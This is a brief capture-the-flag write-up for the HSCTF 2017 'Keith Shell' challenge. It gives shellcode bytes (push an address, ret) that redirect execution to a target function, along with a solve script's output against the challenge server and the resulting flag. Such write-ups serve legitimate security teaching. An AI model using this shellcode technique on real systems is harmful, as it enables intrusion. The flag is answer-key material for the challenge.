HSCTF_2017: Keith Shell

Category: Exploitation Points: 100 Description:

Help Keith write a shellcode to get a flag! Netcat to 104.131.90.29:8003

Write-up

We just need to craft some shellcode to jump to exploit() of address 0x80489fb. So something like this will be sufficient

push 0x80489fb
ret

Translated to opcodes, we get

\x68 \xfb\x89\x04\x08
\xc3

We now have a solution.

$ ./solve.py 
[+] Opening connection to 104.131.90.29 on port 8003: Done
Flag: 9qCzj0cNsRuwyT6HLIz8RAuBp3NMQ1Bdwm2F2CtquuXea5X0lOWKQ4FeU5fJ

[*] Closed connection to 104.131.90.29 port 8003

Therefore, the flag is 9qCzj0cNsRuwyT6HLIz8RAuBp3NMQ1Bdwm2F2CtquuXea5X0lOWKQ4FeU5fJ.